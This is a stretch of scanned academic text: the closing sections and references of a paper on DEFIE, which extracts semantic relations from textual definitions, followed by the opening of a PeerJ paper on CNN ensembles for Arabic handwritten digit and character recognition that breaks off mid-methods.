connecting the pair. Then we examined the whole set of extracted relation instances in R and looked in BabelNet for an unlabeled edge connecting the argu- ments ai and aj. Results in Table 16 show that only 27.7% of the concept pairs representing relation type signatures are connected in BabelNet, and most of these connections are unlabeled. By the same token, more than 4 million distinct argument pairs (53.5%) do not share any edge in the semantic network and, among those that do, less than 14% have a labeled relationship. These proportions suggest that our re- lations provide a potential enrichment of the under- lying knowledge base in terms of both connectivity and labeling of existing edges. In BabelNet, our case study, cross-resource mappings might also propa- gate this information across other knowledge bases and rephrase semantic relations in terms of, e.g., au- tomatically generated Wikipedia hyperlinks. 7 Related Work From the earliest days, OIE systems had to cope with the dimension and heterogeneity of huge un- structured sources of text. The first systems em- ployed statistical techniques and relied heavily on information redundancy. Then, as soon as semi- structured resources came into play (Hovy et al., 2013), researchers started developing learning sys- tems based on self-supervision (Wu and Weld, 2007) and distant supervision (Mintz et al., 2009; Krause et al., 2012). Crucial issues in distant supervision, like noisy training data, have been addressed in var- ious ways: probabilistic graphical models (Riedel et al., 2010; Hoffmann et al., 2011), sophisticated multi-instance learning algorithms (Surdeanu et al., 2012), matrix factorization techniques (Riedel et al., 2013), labeled data infusion (Pershina et al., 2014) or crowd-based human computing (Kondreddi et al., 2014). A different strategy consists of moving from open text extraction to more constrained settings. For instance, the KNOWLEDGE VAULT (Dong et al., 2014) combines Web-scale extraction with prior knowledge from existing knowledge bases; BIPER- PEDIA (Gupta et al., 2014) relies on schema-level attributes from the query stream in order to create an ontology of class-attribute pairs; RENOUN (Yahya et al., 2014) in turn exploits BIPERPEDIA to extract facts expressed as noun phrases. DEFIE focuses, in- stead, on smaller and denser corpora of prescriptive knowledge. Although early works, such as MindNet (Richardson et al., 1998), had already highlighted the potential of textual definitions for extracting re- liable semantic information, no OIE approach to the best of our knowledge has exploited definitional data to extract and disambiguate a large knowledge base of semantic relations. The direction of most papers (especially in the recent OIE literature) seems rather the opposite, namely, to target Web-scale corpora. In contrast, we manage to extract a large amount of high-quality information by combining an OIE un- supervised approach with definitional data. A deeper linguistic analysis constitutes the fo- cus of many OIE approaches. Syntactic dependen- cies are used to construct general relation patterns (Nakashole et al., 2012), or to improve the qual- ity of surface pattern realizations (Moro and Nav- igli, 2013). Phenomena like synonymy and poly- semy have been addressed with kernel-based simi- larity measures and soft clustering techniques (Min et al., 2012; Moro and Navigli, 2013), or exploiting the semantic types of relation arguments (Nakashole et al., 2012; Moro and Navigli, 2012). An appro- priate modeling of semantic types (e.g. selectional preferences) constitutes a line of research by itself, rooted in earlier works like (Resnik, 1996) and fo- cused on either class-based (Clark and Weir, 2002), or similarity-based (Erk, 2007), approaches. How- ever, these methods are used to model the seman- tics of verbs rather than arbitrary patterns. More re- cently some strategies based on topic modeling have been proposed, either to infer latent relation seman- tic types from OIE relations (Ritter et al., 2010), or to directly learn an ontological structure from a start- ing set of relation instances (Movshovitz-Attias and Cohen, 2015). However, the knowledge generated is often hard to interpret and integrate with existing 539 knowledge bases without human intervention (Rit- ter et al., 2010). In this respect, the semantic predi- cates proposed by Flati and Navigli (2013) seem to be more promising. A novelty in our approach is that issues like poly- semy and synonymy are explicitly addressed with a unified entity linking and disambiguation algorithm. By incorporating explicit semantic content in our re- lation patterns, not only do we make relations less ambiguous, but we also abstract away from specific lexicalizations of the content words and merge to- gether many patterns conveying the same semantics. Rather than using plain dependencies we also inject explicit semantic content into the dependency graph to generate a unified syntactic-semantic representa- tion. Previous works (Moro et al., 2013) used simi- lar semantic graph representations to produce filter- ing rules for relation extraction, but they required a starting set of relation patterns and did not exploit syntactic information. A joint approach of syntactic- semantic analysis of text was used in works such as (Lao et al., 2012), but they addressed a substan- tially different task (inference for knowledge base completion) and assumed a radically different set- ting, with a predefined starting set of semantic re- lations from a given knowledge base. As we en- force an OIE approach, we do not have such require- ments and directly process the input text via parsing and disambiguation. This enables DEFIE to gener- ate relations already integrated with resources like WordNet and Wikipedia, without additional align- ment steps (Grycner and Weikum, 2014), or seman- tic type propagations (Lin et al., 2012). As shown in Section 6.3, explicit semantic content within re- lation patterns underpins a rich and high-quality re- lation taxonomy, whereas generalization in (Nakas- hole et al., 2012) is limited to support set inclusion and leads to sparser and less accurate results. 8 Conclusion and Future Work We presented DEFIE, an approach to OIE that, thanks to a novel unified syntactic-semantic analy- sis of text, harvests instances of semantic relations from a corpus of textual definitions. DEFIE ex- tracts knowledge on a large scale, reducing data sparsity and disambiguating both arguments and re- lation patterns at the same time. Unlike previous semantically-enhanced approaches, mostly relying on the semantics of argument types, DEFIE is able to semantify relation phrases as well, by providing explicit links to the underlying knowledge base. We leveraged an input corpus of 4.3 million definitions and extracted over 20 million relation instances, with more than 250,000 distinct relations and almost 2.4 million concepts and entities involved. From these relations we automatically constructed a high- quality relation taxonomy by exploiting the explicit semantic content of the relation patterns. In the resulting knowledge base concepts and entities are linked to existing resources, such as WordNet and Wikipedia, via the BabelNet semantic network. We evaluated DEFIE in terms of precision, coverage, novelty of information in comparison to existing re- sources and quality of disambiguation, and we com- pared our relation taxonomy against state-of-the-art systems obtaining highly competitive results. A key feature of our approach is its deep syntactic-semantic analysis targeted to textual def- initions. In contrast to our competitors, where syn- tactic constraints are necessary in order to keep pre- cision high when dealing with noisy data, DEFIE shows comparable (or greater) performances by ex- ploiting a dense, noise-free definitional setting. DE- FIE generates a large knowledge base, in line with collaboratively-built resources and state-of-the-art OIE systems, but uses a much smaller amount of in- put data: our corpus of definitions comprises less than 83 million tokens overall, while other OIE sys- tems exploit massive corpora like Wikipedia (typi- cally more than 1.5 billion tokens), ClueWeb (more than 33 billion tokens), or the Web itself. Fur- thermore, our semantic analysis based on Babelfy enables the discovery of semantic connections be- tween both general concepts and named entities, with the potential to enrich existing structured and semi-structured resources, as we showed in a pre- liminary study on BabelNet (cf. Section 6.7). As the next step, we plan to apply DEFIE to open text and integrate it with definition extraction and automatic gloss finding algorithms (Navigli and Ve- lardi, 2010; Dalvi et al., 2015). Also, by further ex- ploiting the underlying knowledge base, inference and learning techniques (Lao et al., 2012; Wang et al., 2015) can be applied to complement our model, generating new triples or correcting wrong ones. Fi- 540 nally, another future perspective is to leverage the increasingly large variety of multilingual resources, like BabelNet, and move towards the modeling of language-independent relations. Acknowledgments The authors gratefully acknowledge the support of the ERC Starting Grant MultiJEDI No. 259234. This research was also partially supported by Google through a Faculty Research Award granted in July 2012. References Kurt Bollacker, Colin Evans, Praveen Paritosh, Tim Sturge, and Jamie Taylor. 2008. Freebase: A Collab- oratively Created Graph Database For Structuring Hu- man Knowledge. In Proceedings of SIGMOD, pages 1247–1250. Andrew Carlson, Justin Betteridge, Bryan Kisiel, Burr Settles, Estevam R. Hruschka Jr., and Tom M. Mitchell. 2010. Toward an Architecture for Never- Ending Language Learning. In Proceedings of AAAI, pages 1306–1313. Stephen Clark and James R. Curran. 2007. Wide- coverage Efficient Statistical Parsing with CCG and Log-Linear Models. Computational Linguistics, 33(4):493–552. Stephen Clark and David Weir. 2002. Class-Based Prob- ability Estimation Using a Semantic Hierarchy. Com- putational Linguistics, 28(2):187–206. Bhavana Dalvi, Einat Minkov, Partha P. Talukdar, and William W. Cohen. 2015. Automatic Gloss Finding for a Knowledge Base using Ontological Constraints. In Proceedings of WSDM, pages 369–378. Claudio Delli Bovi, Luis Espinosa Anke, and Roberto Navigli. 2015. Knowledge Base Unification via Sense Embeddings and Disambiguation. In Proceedings of EMNLP, pages 726–736. Xin Dong, Evgeniy Gabrilovich, Geremy Heitz, Wilko Horn, Ni Lao, Kevin Murphy, Thomas Strohmann, Shaohua Sun, and Wei Zhang. 2014. Knowledge Vault: a Web-Scale Approach to Probabilistic Knowl- edge Fusion. In Proceedings of KDD, pages 601–610. Arnab Dutta, Christian Meilicke, and Simone Paolo Ponzetto. 2014. A Probabilistic Approach for Inte- grating Heterogeneous Knowledge Sources. In Pro- ceedings of ESWC, pages 286–301. Katrin Erk. 2007. A Simple, Similarity-based Model for Selectional Preferences. In Proceedings of ACL, page 216–223. Oren Etzioni, Michele Banko, Stephen Soderland, and Daniel S. Weld. 2008. Open Information Extraction from the Web. Commun. ACM, 51(12):68–74. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying Relations for Open Information Extraction. In Proceedings of EMNLP, pages 1535– 1545. Christiane Fellbaum. 1998. WordNet: An Electronic Lexical Database. Bradford Books. Paolo Ferragina and Ugo Scaiella. 2012. Fast and Accu- rate Annotation of Short Texts with Wikipedia Pages. IEEE Software, 29(1):70–75. Tiziano Flati and Roberto Navigli. 2013. SPred: Large- scale Harvesting of Semantic Predicates. In Proceed- ings of ACL, pages 1222–1232. Tiziano Flati, Daniele Vannella, Tommaso Pasini, and Roberto Navigli. 2014. Two Is Bigger (and Better) Than One: the Wikipedia Bitaxonomy Project. In Pro- ceedings of ACL, pages 945–955. Robert W. Floyd. 1962. Algorithm 97: Shortest Path. Communications of the ACM, 5(6):345–345. Adam Grycner and Gerhard Weikum. 2014. HARPY: Hypernyms and Alignment of Relational Paraphrases. In Proceedings of COLING, pages 2195–2204. Rahul Gupta, Alon Halevy, Xuezhi Wang, Steven Eui- jong Whang, and Fei Wu. 2014. Biperpedia: An Ontology for Search Applications. In Proceedings of VLDB, pages 505–516. Raphael Hoffmann, Congle Zhang, Xiao Ling, Luke Zettlemoyer, and Daniel S. Weld. 2011. Knowledge- based Weak Supervision for Information Extraction of Overlapping Relations. In Proceedings of NAACL HLT, pages 541–540. Eduard Hovy, Roberto Navigli, and Simone Paolo Ponzetto. 2013. Collaboratively built semi-structured content and Artificial Intelligence: The story so far. Artificial Intelligence, 194:2–27. Sarath Kumar Kondreddi, Peter Triantafillou, and Ger- hard Weikum. 2014. Combining Information Extrac- tion and Human Computing for Crowdsourced Knowl- edge Acquisition. In Proceedings of ICDE, pages 988–999. Sebastian Krause, Hong Li, Hans Uszkoreit, and Feiyu Xu. 2012. Large-Scale Learning of Relation- Extraction Rules with Distant Supervision from the Web. In Proceedings of ISWC. Ni Lao, Amarnag Subramanya, Fernando Pereira, and William W. Cohen. 2012. Reading the Web with Learned Syntactic-Semantic Inference Rules. In Pro- ceedings of EMNLP-CoNLL, pages 1017–1026. Jens Lehmann, Robert Isele, Max Jakob, Anja Jentzsch, Dimitris Kontokostas, Pablo N. Mendes, Sebastian Hellmann, Mohamed Morsey, Patrick van Kleef, 541 Sören Auer, and Christian Bizer. 2014. DBpedia - A Large-scale, Multilingual Knowledge Base Extracted from Wikipedia. Semantic Web Journal, pages 1–29. Thomas Lin, Mausam, and Oren Etzioni. 2012. No Noun Phrase Left Behind: Detecting and Typing Un- linkable Entities. In Proceedings of EMNLP-CoNLL, pages 893–903. Farzaneh Mahdisoltani, Joanna Biega, and Fabian M. Suchanek. 2015. YAGO3: A Knowledge Base from Multilingual Wikipedias. In CIDR. Pablo N. Mendes, Max Jakob, Andrés García-Silva, and Christian Bizer. 2011. DBPedia Spotlight: Shedding Light on the Web of Documents. In Proceedings of I-Semantics, pages 1–8. Rada Mihalcea and Andras Csomai. 2007. Wikify!: Linking Documents to Encyclopedic Knowledge. In Proceedings of CIKM, pages 233–242. David Milne and Ian H. Witten. 2013. An Open-Source Toolkit for Mining Wikipedia. Artificial Intelligence, 194:222–239. Bonan Min, Shuming Shi, Ralph Grishman, and Chin- Yew Lin. 2012. Ensemble Semantics for Large-scale Unsupervised Relation Extraction. In Proceedings of EMNLP-CoNLL, pages 1027–1037. Mike Mintz, Steven Bills, Rion Snow, and Dan Juraf- sky. 2009. Distant Supervision for Relation Extrac- tion Without Labeled Data. In Proceedings of ACL- IJCNLP, pages 1003–1011. Tom M. Mitchell. 2005. Reading the Web: A Break- through Goal for AI. AI Magazine. Andrea Moro and Roberto Navigli. 2012. WiSeNet: Building a Wikipedia-based Semantic Network with Ontologized Relations. In Proceedings of CIKM, pages 1672–1676. Andrea Moro and Roberto Navigli. 2013. Integrating Syntactic and Semantic Analysis into the Open Infor- mation Extraction Paradigm. In Proceedings of IJCAI, pages 2148–2154. Andrea Moro, Hong Li, Sebastian Krause, Feiyu Xu, Roberto Navigli, and Hans Uszkoreit. 2013. Semantic Rule Filtering for Web-Scale Relation Extraction. In Proceedings of ISWC, pages 347–362. Andrea Moro, Alessandro Raganato, and Roberto Nav- igli. 2014. Entity Linking meets Word Sense Disam- biguation: a Unified Approach. TACL, 2:231–244. Dana Movshovitz-Attias and William W. Cohen. 2015. KB-LDA: Jointly Learning a Knowledge Base of Hi- erarchy, Relations, and Facts. In Proceedings of ACL. Ndapandula Nakashole, Gerhard Weikum, and Fabian M. Suchanek. 2012. PATTY: A Taxonomy of Rela- tional Patterns with Semantic Types. In Proceedings of EMNLP-CoNLL, pages 1135–1145. Vivi Nastase and Michael Strube. 2013. Transform- ing Wikipedia into a Large Scale Multilingual Concept Network. Artificial Intelligence, 194:62–85. Roberto Navigli and Simone Paolo Ponzetto. 2012. Ba- belNet: The Automatic Construction, Evaluation and Application of a Wide-Coverage Multilingual Seman- tic Network. Artificial Intelligence, 193:217–250. Roberto Navigli and Paola Velardi. 2010. Learning Word-class Lattices for Definition and Hypernym Ex- traction. In Proceedings of ACL, pages 1318–1327. Maria Pershina, Bonan Min, Wei Xu, and Ralph Grish- man. 2014. Infusion of Labeled Data into Distant Su- pervision for Relation Extraction. In Proceedings of ACL, pages 732–738. Francesco Piccinno and Paolo Ferragina. 2014. From TagME to WAT: a New Entity Annotator. In Proceed- ings of ERD, pages 55–62. Simone Paolo Ponzetto and Michael Strube. 2011. Tax- onomy Induction Based on a Collaboratively Built Knowledge Repository. Artificial Intelligence, 175(9- 10):1737–1756. Philip Resnik. 1996. Selectional Constraints: An Information-Theoretic Model and its Computational Realization. Cognition, 61(1-2):127–159. Stephen D. Richardson, William B. Dolan, and Lucy Van- derwende. 1998. MindNet: Acquiring and Structur- ing Semantic Information from Text. In Proceedings of ACL, pages 1098–1102. Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling Relations and Their Mentions with- out Labeled Text. In Proceedings of ECML-PKDD, pages 148–163. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M. Marlin. 2013. Relation Extraction with Matrix Factorization and Universal Schemas. In Pro- ceedings of NAACL HLT, pages 74–84. Alan Ritter, Mausam, and Oren Etzioni. 2010. A La- tent Dirichlet Allocation Method for Selectional Pref- erences. In Proceedings of ACL, pages 424–434. Mark Steedman. 2000. The Syntactic Process. MIT Press, Cambridge, MA, USA. Mihai Surdeanu, Julie Tibshirani, Ramesh Nallapati, and Christopher D. Manning. 2012. Multi-instance Multi- label Learning for Relation Extraction. In Proceedings of EMNLP-CoNLL, pages 455–465. Denny Vrandečić. 2012. Wikidata: A New Platform for Collaborative Data Collection. In Proceedings of WWW, pages 1063–1064. William Yang Wang, Kathryn Mazaitis, Ni Lao, Tom M. Mitchell, and William W. Cohen. 2015. Efficient In- ference and Learning in a Large Knowledge Base - Reasoning with Extracted Information using a Locally Groundable First-Order Probabilistic Logic. Machine Learning, 100(1):101–126. 542 Fei Wu and Daniel S. Weld. 2007. Autonomously Semantifying Wikipedia. In Proceedings of CIKM, pages 41–50. Mohamed Yahya, Steven Euijong Whang, Rahul Gupta, and Alon Halevy. 2014. ReNoun: Fact Extraction for Nominal Attributes. In Proceedings of EMNLP, pages 325–335. 543 544 work_vft4ua43ojg5dj5wcu6e4d43ka ---- Submitted 13 June 2018 Accepted 24 September 2018 Published 15 October 2018 Corresponding author Iam Palatnik de Sousa, iam.palat@gmail.com Academic editor Klara Kedem Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.167 Copyright 2018 Palatnik de Sousa Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Convolutional ensembles for Arabic Handwritten Character and Digit Recognition Iam Palatnik de Sousa Department of Electrical Engineering, Pontifícia Universidade Católica do Rio de Janeiro, Rio de Janeiro, Brazil ABSTRACT A learning algorithm is proposed for the task of Arabic Handwritten Character and Digit recognition. The architecture consists on an ensemble of different Convolutional Neural Networks. The proposed training algorithm uses a combination of adaptive gradient descent on the first epochs and regular stochastic gradient descent in the last epochs, to facilitate convergence. Different validation strategies are tested, namely Monte Carlo Cross-Validation and K-fold Cross Validation. Hyper-parameter tuning was done by using the MADbase digits dataset. State of the art validation and testing classification accuracies were achieved, with average values of 99.74% and 99.47% respectively. The same algorithm was then trained and tested with the AHCD character dataset, also yielding state of the art validation and testing classification accuracies: 98.60% and 98.42% respectively. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Computer Vision, Data Mining and Machine Learning Keywords Offline character recognition, Arabic Handwriting Recognition, Convolutional Neural Networks, Deep learning INTRODUCTION Offline handwriting recognition refers to the task of determining what letters or digits are present in a digital image of handwritten text. It is considered a subtask of the more general Optical Character Recognition. However, in many applications, from reading bank checks to postal mail triage, offline recognition plays a key role, greatly motivating the development of accurate and fast classification algorithms (Abdelazeem, 2009). The domain of Arabic Handwriting Recognition (AHR), however, has only been explored in depth more recently. Younis (2017) notes that AHR suffers from slow development compared to Handwriting Recognition in other languages. He further mentions that Arabic characters contain a specific set of challenges that make the task more difficult. Such difficulties include the positioning of dots relative to the main character, the variability caused by the use of the characters in multiple countries and different areas of knowledge and work, among others. Given this issue, using datasets that represent this variability on a large number of images is essential. How to cite this article Palatnik de Sousa (2018), Convolutional ensembles for Arabic Handwritten Character and Digit Recognition. PeerJ Comput. Sci. 4:e167; DOI 10.7717/peerj-cs.167 https://peerj.com mailto:iam.palat@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.167 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.167 In the previous decade, a dataset equivalent to MNIST (LeCun et al., 1998) was developed to allow for a more direct comparison of the performance of classification algorithms on Latin and Arabic digits. This dataset was named MADbase (Abdleazeem & El-Sherif, 2008), and consists of 70,000 images of Arabic digits, written by 700 participants from different areas of work and backgrounds. These are divided into a training set of 60,000 images and a test set of 10,000. This seems to be the largest dataset for this task available in literature. This makes it an ideal choice for training the network and fine-tuning parameters. Furthermore, as discussed in detail on the next section, previous results obtained from this dataset allow for comparison with the results presented in this manuscript. It is worth noting that this dataset is a modified version of an equivalent dataset called ADbase, which contains the same images with a different image size. To create MADbase, ADbase images were resized and transformed from binary to grayscale to be equivalent to MNIST. While the MADbase dataset deals with digits, the Arabic Handwritten Character Dataset (AHCD) (El-Sawy, Loey & Hazem, 2017) includes 16,800 images of isolated characters divided in training set of 13,440 and a test set of 3,360 images. This seems to be the largest dataset available for this classification task. Regarding previous results, Mahmoud (2008) presented a method for recognition of handwritten Arabic digits based on extraction of Gabor-based features and Support Vector Machines (SVMs). The dataset used in this case contained 21,120 samples provided by 44 writers. The average classification accuracy rates obtained were of 99.85% and 97.94% using three scales & five orientations and four scales & six orientations respectively. Abdleazeem & El-Sherif (2008) applied several classification methods to the MADbase dataset. Their best result was obtained with a Radial Basis Function Support Vector Machine (RBF SVM), with which a two stage classification was performed. In the first stage several customized features were extracted from a similar dataset by the researchers, and then used as input for the RBF SVM. The classifier was tuned to maximize the classification accuracy, which had a final value of 99.48%. This value corresponds to the best parameter combination. El Melhaoui et al. (2011) used a small dataset of 600 digit images to obtain a 99% recognition rate using a technique based Loci characteristics. Pandi Selvi & Meyyappan (2013) proposed an approach for Arabic Digit recognition using neural networks and training through backpropagation. The dataset used in this case was also small, and the classification accuracy obtained was 96%. Takruri, Al-Hmouz & Al-Hmouz (2014) obtained a test classification accuracy of 88% using a dataset of 3,510 digit images, by using a three level classifier consisting on SVM, Fuzzy C Means and Unique Pixels. Salameh (2014) presented two methods for enhancing recognition of Arabic Handwritten Digits. The methods combine fuzzy logic pattern classification to counting the number of ends of the digit shapes to obtain a classification test accuracy of 95% for some fonts. Alkhateeb & Alseid (2014), using the ADbase dataset, obtained an 85.26% classification accuracy by using Dynamic Bayesian Networks (DBN). Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 2/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 Although it is hard to compare results provided by training with different datasets, the larger datasets seem to result in worse classification accuracies, most likely since they cover a larger sample of the variability of styles in handwriting. This further indicates that using the largest, more challenging datasets available, with the largest number of writing participants, is an ideal choice, as was done for this manuscript. Loey, El-Sawy & EL-Bakry (2017) used Stacked Autoencoders on the MADbase dataset to obtain a classification accuracy of 98.5%. Mudhsh & Almodfer (2017) obtained a validation accuracy of up to 99.66% on the MADbase dataset by usage of dropout regularization and data augmentation, and an architecture inspired by the VGGNet Convolutional Neural Network (CNN) (Simonyan & Zisserman, 2014). Importantly, they mention in the text that this validation accuracy does not hold for the test set, without mentioning explicitly the test accuracy. The validation method was a 10-fold cross-validation. They also tested the performance of the algorithm on a dataset of 6,600 images of characters, obtaining a validation accuracy of 97.32%. Again they mention that this validation accuracy does not hold for the test set, without clearly stating the test accuracy. Younis (2017) obtained an accuracy of 97.60% on the previously mentioned AHCD dataset, by use of a Deep CNN with batch normalization and learning rate scheduling. The general trend observed in these works is that feature extraction aids in the classification task. This makes the choice of convolution based networks straightforward, as these architectures are precisely constructed to be specialized feature extractors. It seems to make sense that CNNs have the best results so far for this task, in these previously reported results. In this work, the best previous ideas and results are incremented further by usage of some changes in architecture and in the training procedure. Namely both the VGGNet inspiration and a batch normalized CNN are employed, combining their classifications through ensemble averaging. The details of this method are described in the next section. MATERIALS AND METHODS The code for defining and training the networks was implemented in Python, using the Keras framework with Tensorflow backend. The key aspects of the classification system are, namely, the selection and preparation of the datasets, the network architecture, the training schedule, the validation strategy, the data augmentation, and the ensemble selection. Each of these is explained more in detail below. Selection and preparation of datasets The datasets chosen for training and parameter tuning were the MADbase and AHCD datasets described in the previous section. For both datasets, the networks were trained from scratch, although most of the parameter tuning was done with MADbase, since it is a much larger dataset. Since the images in both datasets are already prepared for training, the only pre- processing done was converting the value of each pixel to float format and dividing by 255 for normalization purposes. Figure 1 shows some examples from each dataset. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 3/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 Figure 1 Example images from the MADbase and AHCD datasets. Full-size DOI: 10.7717/peerjcs.167/fig-1 Network architecture The classification method consists on an ensemble of four networks. These are actually two networks, each trained with two different strategies (with data augmentation and without). Rather than choosing whether to apply augmentation or not, both options are used and the results are gathered in an ensemble classifier. This also allows for a direct comparison of the predictive power of each individual network against the results of the ensemble. For brevity, the ensemble of four networks will be called ENS4 throughout the manuscript. The first type of CNN used in the ensemble was inspired by the VGG16 network, readily implemented for Keras. This architecture couldn’t be used directly, however, because it assumes the inputs are images of three channels (RGB) of default size 224 by 244 pixels, and minimum size 48 by 48 pixels. Images below this size are too small to pass through the five convolution blocks of the Network. The images of MADbase and AHCD have dimensions of 28 by 28 pixels and 32 by 32 pixels, respectively. Furthermore they are grayscale images with only 1 channel. The solution to this was adapting the VGG16 architecture by removing the fifth convolution block, and creating three channel images from the one channel images by simply stacking the same single channel three times. Another adaptation added was a dropout layer before the final dense softmax layer, and only using two dense layers instead of three. The resulting 12 layer architecture, intended for these grayscale images, will be called VGG12 on this manuscript, for brevity. The second type of CNN used was designed from scratch in this work to include the dropout and batch normalization regularizations within both the feature extraction convolution blocks as well as the dense fully connected classification block. The architecture was adapted after several experiments to be as simple as possible, allowing for fast training, while still providing robust classifications. For brevity this architecture that includes Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.167/fig-1 http://dx.doi.org/10.7717/peerj-cs.167 Figure 2 Diagrams of VGG12 and REGU. CONV refers to convolutional layers, POOL to max-pooling layers, FULL to dense fully connected layers and NORM to batch normalization layers. Purple round rect- angles correspond to convolutional feature extraction blocks, and orange round rectangles correspond to fully connected classification blocks. More details about the architectures can be found on a suplemental file along the manuscript. Full-size DOI: 10.7717/peerjcs.167/fig-2 both types of regularizations (dropout and batch normalization) will be termed REGU throughout the rest of the manuscript. Figure 2 contains illustrative schemes of VGG12 and REGU. Namely, VGG12 contains four convolution blocks and one fully connected block. The convolution filters used in all convolution layers have size 3 × 3. The number of filters used in the first block is 64, and doubles on every further block up to 512 on block 4. ReLU activation was used for the convolution layers, as well as same padding. The max pooling elements had a size of 2 × 2. The fully connected block has two dense layers. The first, with ReLU activation, has 512 neurons. The second, with softmax activation, has 10 neurons for the case of MADbase and 28 for the case of AHCD. A 0.25 dropout rate was used. Regarding REGU, there are two convolution blocks and one fully connected block. The first convolution block has two convolution layers with 32 filters of size 3 × 3 and ReLU activation. A 0.2 dropout rate was used, followed by Batch Normalization. The max pooling elements had a size of 2 × 2. The second convolution block is identical, except for the number of convolution filters, which is 64 and for a Batch Normalization applied at the start of the block. The fully connected block in this case has Batch Normalizations before each dense layer. The dense layers are identical to the case of VGG12. The first has 512 neurons and ReLU activation, and the second has softmax activation and 10 neurons for MADBase and 28 Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 5/13 https://peerj.com https://doi.org/10.7717/peerjcs.167/fig-2 http://dx.doi.org/10.7717/peerj-cs.167 neurons for AHCD. A 0.2 dropout rate was used. These descriptions are summarized in a supplemental file that can be used for building this architecture on Keras. Training schedule The literature review and previous works cited show that, in general, the training for AHR tasks is done with optimizers such as Stochastic Gradient Descent (SGD) or with an adaptive method such as Adam (Kingma & Ba, 2014), often paired with learning rate schedules. However, a generalization gap between Adam and SGD has been observed recently for many tasks involving image classification and language modelling (Keskar & Socher, 2017). It has been indicated that that SGD finds more optimal lower minimums for the loss function, despite converging at a much lower rate than Adam. According to Keskar and Socher, this favors the usage of Adam for the first epochs of training, providing a fast convergence to lower losses, with a swap to SGD for a more fine convergence at the end of the training. This swapping strategy closed the generalization gap on the tests performed by Keskar and Socher. A few experiments were performed with VGG12 and REGU using Adam, SGD and this Adam and SGD swapping strategy. The initial results confirmed the observations of Keskar and Socher, and as such the swapping strategy was adopted for the rest of the experiments. Namely, the number of epochs before and after the swap was treated as a parameter to be tuned, and eventually values of 20 epochs of Adam training followed by 20 epochs of SGD training seemed to provide the best results. For the 20 epochs of SGD training, inspired by previous works that used learning rate scheduling, a strategy of reducing the learning rate periodically was adopted. Specifically, this only happened if and when the test loss reached a plateau. There is an already implemented function in Keras, ReduceonLRPPlateau, for this purpose. Whenever a plateau was reached, the learning rate was multiplied by a factor of 0.1. For this task in particular, the choice of this training strategy produced better results when compared to use of SGD or Adam individually for 40 epochs. It is the first time such a strategy has been employed for the task of Arabic Handwritten Character and Digit Recognition. It is also worth noting that using SGD individually didn’t reliably give similar results to the swapping strategy, even when more training epochs were allowed, as SGD seemed to have trouble converging on the first few epochs of training, remaining at high training and validation and loss values. The loss function used was Categorical Cross-entropy, which is adequate given the softmax activation of the last dense layer of both VGG12 and REGU. Mean square error was also tried in initial experiments, but it consistently resulted in worse performance. Validation strategy Both datasets used (MADbase and AHCD) provide separate test sets, but not separate validation sets. If the test sets were to be used for validation purposes, this would make the classifier heavily biased towards that specific test set. It would then be difficult to verify how good the classifier is at generalizing. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 6/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 As such, using part of the training set for validation is the ideal approach. With the validation set all the parameters were tuned to find the highest values of validation accuracy, and only after this training was done, and no other changes were to be effected to ENS4, the testing set was used for evaluation. However this means that the validation strategy chosen for parameter tuning could affect the generalization capabilities of the network. Furthermore, there is randomness present in the training procedure, whether in weight initialization, in the data augmentation method, the dropout regularization or other aspects. This suggests that multiple runs are necessary to obtain an average behavior and performance of the classifier. The most commonly applied validation methodologies that use multiple runs are Monte Carlo Cross-Validation (MCCV) (Xu & Liang, 2001) and K-fold Cross-Validation (KCV) (Refaeilzadeh, Tang & Liu, 2016). In MCCV, a subset of the training set is chosen at random and used as a validation set. This is repeated as many times as necessary, in general ensuring that the validation set always has the same size. In KCV the training set is divided into K subsets (named folds) of the same size, and each fold is used as a validation set, while all of the other folds are gathered as a training set. A very commonly used value for K is 10. Generally speaking there isn’t a definitive answer as to which of these two methodologies is best for a given task, as this is highly dependent on the particularities of each dataset. Mudhsh & Almodfer (2017), for instance, have used 10-fold cross validation in their study of MADbase. For this present manuscript, both MCCV and KCV were employed for the MADbase dataset to give as much information as possible for fine-tuning the parameters, before the test set was used for evaluation. Since the test set has 10,000 images for MADbase, the MCCV was implemented so that the validation sets also had 10,000 images. This means the training sets effectively had 50,000 images during training. A total of 10 runs were performed in this manner, and the average performances were computed. For the KCV, a 10-fold Cross-Validation was used to allow for direct comparison with the results of Mudhsh & Almodfer (2017), but it must be noted that dividing the original training set of 60,000 into 10 folds means each validation set has a size of 6,000. Since the size of the validation set can be adjusted by changing the value of K, and the test set size is fixed, a 6-fold validation was also performed (since this implies validation sets of size 10,000, the same as the provided test sets). Given the smaller size of AHCD, using 10-fold cross validation makes the validation sets too small compared to the test set, and as such only MCCV was employed in that case, ensuring the validation and test sets had the same size. As with MADbase, this cross-validation was repeated 10 times. The results of the several runs with each method were averaged to allow for decision making regarding parameter tuning. Once the best validation results were reached with ENS4, the test set was used for evaluation. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 7/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 Data augmentation The method of data augmentation has been used previously in AHR (Mudhsh & Almodfer, 2017). In the present study, data augmentation was applied to the training sets of both MADbase and AHCD in some of the experiments. The purpose is to create a more varied dataset that could make the classifier more robust. Since ENS4 includes both the networks trained without and with data augmentation, the networks corresponding to the latter case will be named VGG12_aug and REGU_aug for disambiguation. The augmentation method used was the already implemented ImageDataGenerator on Keras, with 